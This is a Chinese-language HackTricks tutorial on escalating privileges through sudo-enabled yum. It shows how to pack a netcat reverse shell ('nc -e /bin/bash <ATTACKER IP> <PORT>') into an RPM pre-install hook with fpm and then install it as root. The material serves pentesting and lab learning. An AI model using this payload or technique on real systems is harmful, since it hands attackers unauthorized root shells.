hacktricks/linux-unix/privilege-escalation/exploiting-yum.md

<details>

<summary><strong>零基础学习AWS黑客技术直至成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>！</strong></summary>

支持HackTricks的其他方式：

* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。**

</details>

关于yum的更多示例也可以在[gtfobins](https://gtfobins.github.io/gtfobins/yum/)上找到。

# 通过RPM包执行任意命令
## 检查环境
为了利用这个向量，用户必须能够以更高权限的用户身份执行yum命令，即root。

### 这个向量的一个工作示例
这个漏洞的一个工作示例可以在[tryhackme](https://tryhackme.com)上的[daily bugle](https://tryhackme.com/room/dailybugle)房间中找到。

## 打包一个RPM
在接下来的部分中，我将介绍使用[fpm](https://github.com/jordansissel/fpm)将一个反向shell打包进一个RPM。

下面的示例创建了一个包，其中包含一个安装前触发器，带有攻击者可以定义的任意脚本。安装此包时，将执行任意命令。我使用了一个简单的反向netcat shell示例进行演示，但这可以根据需要更改。
```text
EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
```
# 捕获一个 shell
使用上述示例并假设 `yum` 可以作为更高权限的用户执行。

1. **传输** rpm 到主机
2. **启动** 本地主机上的监听器，例如 [示例 netcat 监听器](/shells/shells/linux#netcat)
3. **安装** 易受攻击的包 `yum localinstall -y exploited-1.0-1.noarch.rpm`


<details>

<summary><strong>从零开始学习 AWS 黑客攻击直到成为专家，通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS 红队专家)</strong></a><strong>！</strong></summary>

支持 HackTricks 的其他方式：

* 如果您希望在 HackTricks 中看到您的**公司广告**或**下载 HackTricks 的 PDF**，请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)！
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现 [**PEASS 家族**](https://opensea.io/collection/the-peass-family)，我们独家的 [**NFTs 集合**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。

</details>